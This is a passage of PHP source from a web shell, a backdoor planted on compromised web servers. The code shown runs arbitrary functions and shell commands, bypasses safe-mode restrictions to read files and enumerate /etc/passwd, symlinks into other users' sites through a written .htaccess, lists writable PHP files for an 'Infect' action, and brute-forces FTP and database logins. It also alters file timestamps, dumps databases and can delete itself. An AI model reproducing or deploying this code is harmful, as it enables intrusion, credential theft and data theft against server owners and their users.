632 $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
633 echo strlen($temp), "\n", $temp;
634 exit;
635 }
636 printHeader();
637 echo '<h1>String conversions</h1><div class=content>';
638 $stringTools = array(
639 'Base64 encode' => 'base64_encode',
640 'Base64 decode' => 'base64_decode',
641 'Url encode' => 'urlencode',
642 'Url decode' => 'urldecode',
643 'Full urlencode' => 'full_urlencode',
644 'md5 hash' => 'md5',
645 'sha1 hash' => 'sha1',
646 'crypt' => 'crypt',
647 'CRC32' => 'crc32',
648 'ASCII to HEX' => 'ascii2hex',
649 'HEX to ASCII' => 'hex2ascii',
650 'HEX to DEC' => 'hexdec',
651 'HEX to BIN' => 'hex2bin',
652 'DEC to HEX' => 'dechex',
653 'DEC to BIN' => 'decbin',
654 'BIN to HEX' => 'bin2hex',
655 'BIN to DEC' => 'bindec',
656 'String to lower case' => 'strtolower',
657 'String to upper case' => 'strtoupper',
658 'Htmlspecialchars' => 'htmlspecialchars',
659 'String length' => 'strlen',
660 );
661 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
662 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
663 echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
664 foreach($stringTools as $k => $v)
665 echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
666 echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
667 if(!empty($_POST['p1'])) {
668 if(function_exists($_POST['p1']))
669 echo htmlspecialchars($_POST['p1']($_POST['p2']));
670 }
671 echo"</pre></div>";
672 ?>
673 <br><h1>Search for hash:</h1><div class=content>
674 <form method='post' target='_blank' name="hf">
675 <input type="text" name="hash" style="width:200px;"><br>
676 <input type="button" value="hashcrack.com" onclick="document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()"><br>
677 <input type="button" value="fakenamegenerator.com" onclick="document.hf.action='http://www.fakenamegenerator.com/';document.hf.submit()"><br>
678 <input type="button" value="tools4noobs.com" onclick="document.hf.action='http://www.tools4noobs.com/online_php_functions/';document.hf.submit()"><br>
679 <input type="button" value="md5.rednoize.com" onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()"><br>
680 <input type="button" value="md5decrypter.com" onclick="document.hf.action='http://www.md5decrypter.com/';document.hf.submit()"><br>
681 </form>
682 </div>
683 <?php
684 printFooter();
685}
686function actionFilesTools() {
687 if( isset($_POST['p1']) )
688 $_POST['p1'] = urldecode($_POST['p1']);
689 if(@$_POST['p2']=='download') {
690 if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
691 ob_start("ob_gzhandler", 4096);
692 header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
693 if (function_exists("mime_content_type")) {
694 $type = @mime_content_type($_POST['p1']);
695 header("Content-Type: ".$type);
696 }
697 $fp = @fopen($_POST['p1'], "r");
698 if($fp) {
699 while(!@feof($fp))
700 echo @fread($fp, 1024);
701 fclose($fp);
702 }
703 } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
704 }
705 exit;
706 }
707 if( @$_POST['p2'] == 'mkfile' ) {
708 if(!file_exists($_POST['p1'])) {
709 $fp = @fopen($_POST['p1'], 'w');
710 if($fp) {
711 $_POST['p2'] = "edit";
712 fclose($fp);
713 }
714 }
715 }
716 printHeader();
717 echo '<h1>File tools</h1><div class=content>';
718 if( !file_exists(@$_POST['p1']) ) {
719 echo 'File not exists';
720 printFooter();
721 return;
722 }
723 $uid = @posix_getpwuid(@fileowner($_POST['p1']));
724 $gid = @posix_getgrgid(@fileowner($_POST['p1']));
725 echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
726 echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
727 if( empty($_POST['p2']) )
728 $_POST['p2'] = 'view';
729 if( is_file($_POST['p1']) )
730 $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
731 else
732 $m = array('Chmod', 'Rename', 'Touch');
733 foreach($m as $v)
734 echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
735 echo '<br><br>';
736 switch($_POST['p2']) {
737 case 'view':
738 echo '<pre class=ml1>';
739 $fp = @fopen($_POST['p1'], 'r');
740 if($fp) {
741 while( !@feof($fp) )
742 echo htmlspecialchars(@fread($fp, 1024));
743 @fclose($fp);
744 }
745 echo '</pre>';
746 break;
747 case 'highlight':
748 if( is_readable($_POST['p1']) ) {
749 echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
750 $code = highlight_file($_POST['p1'],true);
751 echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
752 }
753 break;
754 case 'chmod':
755 if( !empty($_POST['p3']) ) {
756 $perms = 0;
757 for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
758 $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
759 if(!@chmod($_POST['p1'], $perms))
760 echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
761 else
762 die('<script>g(null,null,null,null,"")</script>');
763 }
764 echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
765 break;
766 case 'edit':
767 if( !is_writable($_POST['p1'])) {
768 echo 'File isn\'t writeable';
769 break;
770 }
771 if( !empty($_POST['p3']) ) {
772 @file_put_contents($_POST['p1'],$_POST['p3']);
773 echo 'Saved!<br><script>document.mf.p3.value="";</script>';
774 }
775 echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';
776 $fp = @fopen($_POST['p1'], 'r');
777 if($fp) {
778 while( !@feof($fp) )
779 echo htmlspecialchars(@fread($fp, 1024));
780 @fclose($fp);
781 }
782 echo '</textarea><input type=submit value=">>"></form>';
783 break;
784 case 'hexdump':
785 $c = @file_get_contents($_POST['p1']);
786 $n = 0;
787 $h = array('00000000<br>','','');
788 $len = strlen($c);
789 for ($i=0; $i<$len; ++$i) {
790 $h[1] .= sprintf('%02X',ord($c[$i])).' ';
791 switch ( ord($c[$i]) ) {
792 case 0: $h[2] .= ' '; break;
793 case 9: $h[2] .= ' '; break;
794 case 10: $h[2] .= ' '; break;
795 case 13: $h[2] .= ' '; break;
796 default: $h[2] .= $c[$i]; break;
797 }
798 $n++;
799 if ($n == 32) {
800 $n = 0;
801 if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
802 $h[1] .= '<br>';
803 $h[2] .= "\n";
804 }
805 }
806 echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
807 break;
808 case 'rename':
809 if( !empty($_POST['p3']) ) {
810 if(!@rename($_POST['p1'], $_POST['p3']))
811 echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>';
812 else
813 die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
814 }
815 echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
816 break;
817 case 'touch':
818 if( !empty($_POST['p3']) ) {
819 $time = strtotime($_POST['p3']);
820 if($time) {
821 if(@touch($_POST['p1'],$time,$time))
822 die('<script>g(null,null,null,null,"")</script>');
823 else {
824 echo 'Fail!<script>document.mf.p3.value="";</script>';
825 }
826 } else echo 'Bad time format!<script>document.mf.p3.value="";</script>';
827 }
828 echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
829 break;
830 case 'mkfile':
831
832 break;
833 }
834 echo '</div>';
835 printFooter();
836}
837function actionSafeMode() {
838 $temp='';
839 ob_start();
840 switch($_POST['p1']) {
841 case 1:
842 $temp=@tempnam($test, 'cx');
843 if(@copy("compress.zlib://".$_POST['p2'], $temp)){
844 echo @file_get_contents($temp);
845 unlink($temp);
846 } else
847 echo 'Sorry... Can\'t open file';
848 break;
849 case 2:
850 $files = glob($_POST['p2'].'*');
851 if( is_array($files) )
852 foreach ($files as $filename)
853 echo $filename."\n";
854 break;
855 case 3:
856 $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
857 curl_exec($ch);
858 break;
859 case 4:
860 ini_restore("safe_mode");
861 ini_restore("open_basedir");
862 include($_POST['p2']);
863 break;
864 case 5:
865 for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
866 $uid = @posix_getpwuid($_POST['p2']);
867 if ($uid)
868 echo join(':',$uid)."\n";
869 }
870 break;
871 case 6:
872 if(!function_exists('imap_open'))break;
873 $stream = imap_open($_POST['p2'], "", "");
874 if ($stream == FALSE)
875 break;
876 echo imap_body($stream, 1);
877 imap_close($stream);
878 break;
879 }
880 $temp = ob_get_clean();
881 printHeader();
882 echo '<h1>Safe mode bypass</h1><div class=content>';
883 echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>';
884 if($temp)
885 echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
886 echo '</div>';
887 printFooter();
888}
889function actionConsole() {
890 if(isset($_POST['ajax'])) {
891 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
892 ob_start();
893 echo "document.cf.cmd.value='';\n";
894 $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));
895 if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
896 if(@chdir($match[1])) {
897 $GLOBALS['cwd'] = @getcwd();
898 echo "document.mf.c.value='".$GLOBALS['cwd']."';";
899 }
900 }
901 echo "document.cf.output.value+='".$temp."';";
902 echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
903 $temp = ob_get_clean();
904 echo strlen($temp), "\n", $temp;
905 exit;
906 }
907 printHeader();
908?>
909<script>
910if(window.Event) window.captureEvents(Event.KEYDOWN);
911var cmds = new Array("");
912var cur = 0;
913function kp(e) {
914 var n = (window.Event) ? e.which : e.keyCode;
915 if(n == 38) {
916 cur--;
917 if(cur>=0)
918 document.cf.cmd.value = cmds[cur];
919 else
920 cur++;
921 } else if(n == 40) {
922 cur++;
923 if(cur < cmds.length)
924 document.cf.cmd.value = cmds[cur];
925 else
926 cur--;
927 }
928}
929function add(cmd) {
930 cmds.pop();
931 cmds.push(cmd);
932 cmds.push("");
933 cur = cmds.length-1;
934}
935</script>
936<?php
937 echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>';
938 foreach($GLOBALS['aliases'] as $n => $v) {
939 if($v == '') {
940 echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
941 continue;
942 }
943 echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
944 }
945 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
946 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
947 echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
948 if(!empty($_POST['p1'])) {
949 echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
950 }
951 echo '</textarea><input type=text name=cmd style="border-top:0;width:100%;margin:0;" onkeydown="kp(event);">';
952 echo '</form></div><script>document.cf.cmd.focus();</script>';
953 printFooter();
954}
955function actionLogout() {
956 unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
957 echo 'bye!';
958}
959function actionSelfRemove() {
960 printHeader();
961 if($_POST['p1'] == 'yes') {
962 if(@unlink(SELF_PATH))
963 die('Shell has been removed');
964 else
965 echo 'unlink error!';
966 }
967 echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
968 printFooter();
969}
970function actionTools() {
971 printHeader();
972
973 printFooter();
974}
975function actionDomains() {
976 printHeader();
977 error_reporting(0);
978echo "<title>#Domains & Users</title>";
979mkdir("sym");
980symlink("/","0/x.txt");
981$c = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
982$f = fopen ('sym/.htaccess','w');
983 fwrite($f , $c);
984
985$d0mains = @file("/etc/named.conf");
986if(!$d0mains){ die("<b>#Error... -> [ /etc/named.conf ]"); }
987echo "<table align=center border=1>
988<tr bgcolor=teal><td>Domain</td><td>User List </td><td>Symlink</td></tr>";
989foreach($d0mains as $d0main){
990if(eregi("zone",$d0main)){
991preg_match_all('#zone "(.*)"#', $d0main, $domains);
992flush();
993if(strlen(trim($domains[1][0])) > 2){
994$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
995echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td><td><a href='sym/x.txt/home/".$user['name']."/public_html'>Miremos</a></td></tr>"; flush();
996}}}
997echo "</table>
998<p align='center'>
999FailRoot'Cod3rz <a href='http://failroot.wordpress.com/'>FailRoot-Sec.Com</a> | <a
1000href='http://wWw.sEc4EvEr.CoM/'>wWw.sEc4EvEr.CoM</a><br>
1001</p>
1002";
1003 printFooter();
1004}
1005function actionInfect() {
1006 printHeader();
1007 echo '<h1>Infect</h1><div class=content>';
1008 if($_POST['p1'] == 'infect') {
1009 $target=$_SERVER['DOCUMENT_ROOT'];
1010 function ListFiles($dir) {
1011 if($dh = opendir($dir)) {
1012 $files = Array();
1013 $inner_files = Array();
1014 while($file = readdir($dh)) {
1015 if($file != "." && $file != "..") {
1016 if(is_dir($dir . "/" . $file)) {
1017 $inner_files = ListFiles($dir . "/" . $file);
1018 if(is_array($inner_files)) $files = array_merge($files, $inner_files);
1019 } else {
1020 array_push($files, $dir . "/" . $file);
1021 }
1022 }
1023 }
1024 closedir($dh);
1025 return $files;
1026 }
1027 }
1028 foreach (ListFiles($target) as $key=>$file){
1029 $nFile = substr($file, -4, 4);
1030 if($nFile == ".php" ){
1031 if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){
1032 echo "$file<br>";
1033 $i++;
1034 }
1035 }
1036 }
1037 echo "<font color=red size=14>$i</font>";
1038 }else{
1039 echo "<form method=post><input type=submit value=Infect name=infet></form>";
1040 echo 'Really want to infect the server? <a href=# onclick="g(null,null,\'infect\')">Yes</a></div>';
1041 }
1042 printFooter();
1043}
1044function actionBruteforce() {
1045 printHeader();
1046 if( isset($_POST['proto']) ) {
1047 echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
1048 if( $_POST['proto'] == 'ftp' ) {
1049 function bruteForce($ip,$port,$login,$pass) {
1050 $fp = @ftp_connect($ip, $port?$port:21);
1051 if(!$fp) return false;
1052 $res = @ftp_login($fp, $login, $pass);
1053 @ftp_close($fp);
1054 return $res;
1055 }
1056 } elseif( $_POST['proto'] == 'mysql' ) {
1057 function bruteForce($ip,$port,$login,$pass) {
1058 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
1059 @mysql_close($res);
1060 return $res;
1061 }
1062 } elseif( $_POST['proto'] == 'pgsql' ) {
1063 function bruteForce($ip,$port,$login,$pass) {
1064 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''";
1065 $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
1066 @pg_close($res);
1067 return $res;
1068 }
1069 }
1070 $success = 0;
1071 $attempts = 0;
1072 $server = explode(":", $_POST['server']);
1073 if($_POST['type'] == 1) {
1074 $temp = @file('/etc/passwd');
1075 if( is_array($temp) )
1076 foreach($temp as $line) {
1077 $line = explode(":", $line);
1078 ++$attempts;
1079 if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
1080 $success++;
1081 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
1082 }
1083 if(@$_POST['reverse']) {
1084 $tmp = "";
1085 for($i=strlen($line[0])-1; $i>=0; --$i)
1086 $tmp .= $line[0][$i];
1087 ++$attempts;
1088 if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
1089 $success++;
1090 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
1091 }
1092 }
1093 }
1094 } elseif($_POST['type'] == 2) {
1095 $temp = @file($_POST['dict']);
1096 if( is_array($temp) )
1097 foreach($temp as $line) {
1098 $line = trim($line);
1099 ++$attempts;
1100 if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
1101 $success++;
1102 echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
1103 }
1104 }
1105 }
1106 echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
1107 }
1108 echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
1109 .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
1110 .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
1111 .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
1112 .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
1113 .'<span>Server:port</span></td>'
1114 .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
1115 .'<tr><td><span>Brute type</span></td>'
1116 .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
1117 .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
1118 .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
1119 .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
1120 .'<td><input type=text name=login value="root"></td></tr>'
1121 .'<tr><td><span>Dictionary</span></td>'
1122 .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
1123 .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
1124 echo '</div><br>';
1125 printFooter();
1126}
1127function actionSql() {
1128 class DbClass {
1129 var $type;
1130 var $link;
1131 var $res;
1132 function DbClass($type) {
1133 $this->type = $type;
1134 }
1135 function connect($host, $user, $pass, $dbname){
1136 switch($this->type) {
1137 case 'mysql':
1138 if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
1139 break;
1140 case 'pgsql':
1141 $host = explode(':', $host);
1142 if(!$host[1]) $host[1]=5432;
1143 if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
1144 break;
1145 }
1146 return false;
1147 }
1148 function selectdb($db) {
1149 switch($this->type) {
1150 case 'mysql':
1151 if (@mysql_select_db($db))return true;
1152 break;
1153 }
1154 return false;
1155 }
1156 function query($str) {
1157 switch($this->type) {
1158 case 'mysql':
1159 return $this->res = @mysql_query($str);
1160 break;
1161 case 'pgsql':
1162 return $this->res = @pg_query($this->link,$str);
1163 break;
1164 }
1165 return false;
1166 }
1167 function fetch() {
1168 $res = func_num_args()?func_get_arg(0):$this->res;
1169 switch($this->type) {
1170 case 'mysql':
1171 return @mysql_fetch_assoc($res);
1172 break;
1173 case 'pgsql':
1174 return @pg_fetch_assoc($res);
1175 break;
1176 }
1177 return false;
1178 }
1179 function listDbs() {
1180 switch($this->type) {
1181 case 'mysql':
1182 return $this->res = @mysql_list_dbs($this->link);
1183 break;
1184 case 'pgsql':
1185 return $this->res = $this->query("SELECT datname FROM pg_database");
1186 break;
1187 }
1188 return false;
1189 }
1190 function listTables() {
1191 switch($this->type) {
1192 case 'mysql':
1193 return $this->res = $this->query('SHOW TABLES');
1194 break;
1195 case 'pgsql':
1196 return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'");
1197 break;
1198 }
1199 return false;
1200 }
1201 function error() {
1202 switch($this->type) {
1203 case 'mysql':
1204 return @mysql_error($this->link);
1205 break;
1206 case 'pgsql':
1207 return @pg_last_error($this->link);
1208 break;
1209 }
1210 return false;
1211 }
1212 function setCharset($str) {
1213 switch($this->type) {
1214 case 'mysql':
1215 if(function_exists('mysql_set_charset'))
1216 return @mysql_set_charset($str, $this->link);
1217 else
1218 $this->query('SET CHARSET '.$str);
1219 break;
1220 case 'mysql':
1221 return @pg_set_client_encoding($this->link, $str);
1222 break;
1223 }
1224 return false;
1225 }
1226 function dump($table) {
1227 switch($this->type) {
1228 case 'mysql':
1229 $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
1230 $create = mysql_fetch_array($res);
1231 echo $create[1].";\n\n";
1232 $this->query('SELECT * FROM `'.$table.'`');
1233 while($item = $this->fetch()) {
1234 $columns = array();
1235 foreach($item as $k=>$v) {
1236 $item[$k] = "'".@mysql_real_escape_string($v)."'";
1237 $columns[] = "`".$k."`";
1238 }
1239 echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
1240 }
1241 break;
1242 case 'pgsql':
1243 $this->query('SELECT * FROM '.$table);
1244 while($item = $this->fetch()) {
1245 $columns = array();
1246 foreach($item as $k=>$v) {
1247 $item[$k] = "'".addslashes($v)."'";
1248 $columns[] = $k;
1249 }
1250 echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
1251 }
1252 break;
1253 }
1254 return false;
1255 }
1256 };
1257 $db = new DbClass($_POST['type']);
1258 if(@$_POST['p2']=='download') {
1259 ob_start("ob_gzhandler", 4096);
1260 $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
1261 $db->selectdb($_POST['sql_base']);
1262 header("Content-Disposition: attachment; filename=dump.sql");
1263 header("Content-Type: text/plain");
1264 foreach($_POST['tbl'] as $v)
1265 $db->dump($v);
1266 exit;
1267 }
1268 printHeader();
1269 ?>
1270 <h1>Sql browser</h1><div class=content>
1271 <form name="sf" method="post">
1272 <table cellpadding="2" cellspacing="0">
1273 <tr>
1274 <td>Type</td>
1275 <td>Host</td>
1276 <td>Login</td>
1277 <td>Password</td>
1278 <td>Database</td>
1279 <td></td>
1280 </tr>
1281 <tr>
1282 <input type=hidden name=a value=Sql>
1283 <input type=hidden name=p1 value='query'>
1284 <input type=hidden name=p2>
1285 <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd']);?>'>
1286 <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
1287 <td>
1288 <select name='type'>
1289 <option value="mysql" <?php if(@$_POST['type']=='mysql')echo 'selected';?>>MySql</option>
1290 <option value="pgsql" <?php if(@$_POST['type']=='pgsql')echo 'selected';?>>PostgreSql</option>
1291 </select></td>
1292 <td><input type=text name=sql_host value='<?=(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host']));?>'></td>
1293 <td><input type=text name=sql_login value='<?=(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login']));?>'></td>
1294 <td><input type=text name=sql_pass value='<?=(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass']));?>'></td>
1295 <td>
1296 <?php
1297 $tmp = "<input type=text name=sql_base value=''>";
1298 if(isset($_POST['sql_host'])){
1299 if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
1300 switch($_POST['charset']) {
1301 case "Windows-1251": $db->setCharset('cp1251'); break;
1302 case "UTF-8": $db->setCharset('utf8'); break;
1303 case "KOI8-R": $db->setCharset('koi8r'); break;
1304 case "KOI8-U": $db->setCharset('koi8u'); break;
1305 case "cp866": $db->setCharset('cp866'); break;
1306 }
1307 $db->listDbs();
1308 echo "<select name=sql_base><option value=''></option>";
1309 while($item = $db->fetch()) {
1310 list($key, $value) = each($item);
1311 echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
1312 }
1313 echo '</select>';
1314 }
1315 else echo $tmp;
1316 }else
1317 echo $tmp;
1318 ?></td>
1319 <td><input type=submit value=">>"></td>
1320 </tr>
1321 </table>
1322 <script>
1323 function st(t,l) {
1324 document.sf.p1.value = 'select';
1325 document.sf.p2.value = t;
1326 if(l!=null)document.sf.p3.value = l;
1327 document.sf.submit();
1328 }
1329 function is() {
1330 for(i=0;i<document.sf.elements['tbl[]'].length;++i)
1331 document.sf.elements['tbl[]'][i].checked = !document.sf.elements['tbl[]'][i].checked;
1332 }
1333 </script>
1334 <?php
1335 if(isset($db) && $db->link){
1336 echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
1337 if(!empty($_POST['sql_base'])){
1338 $db->selectdb($_POST['sql_base']);
1339 echo "<tr><td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'><span>Tables:</span><br><br>";
1340 $tbls_res = $db->listTables();
1341 while($item = $db->fetch($tbls_res)) {
1342 list($key, $value) = each($item);
1343 $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
1344 $value = htmlspecialchars($value);
1345 echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr><br>";
1346 }
1347 echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:2px solid #666;'>";
1348 if(@$_POST['p1'] == 'select') {
1349 $_POST['p1'] = 'query';
1350 $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].'');
1351 $num = $db->fetch();
1352 $num = $num['n'];
1353 echo "<span>".$_POST['p2']."</span> ($num) ";
1354 for($i=0;$i<($num/30);$i++)
1355 if($i != (int)$_POST['p3'])
1356 echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i+1),"</a> ";
1357 else
1358 echo ($i+1)," ";
1359 if($_POST['type']=='pgsql')
1360 $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
1361 else
1362 $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
1363 echo "<br><br>";
1364 }
1365 if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) {
1366 $db->query(@$_POST['p3']);
1367 if($db->res !== false) {
1368 $title = false;
1369 echo '<table width=100% cellspacing=0 cellpadding=2 class=main>';
1370 $line = 1;
1371 while($item = $db->fetch()) {
1372 if(!$title) {
1373 echo '<tr>';
1374 foreach($item as $key => $value)
1375 echo '<th>'.$key.'</th>';
1376 reset($item);
1377 $title=true;
1378 echo '</tr><tr>';
1379 $line = 2;
1380 }
1381 echo '<tr class="l'.$line.'">';
1382 $line = $line==1?2:1;
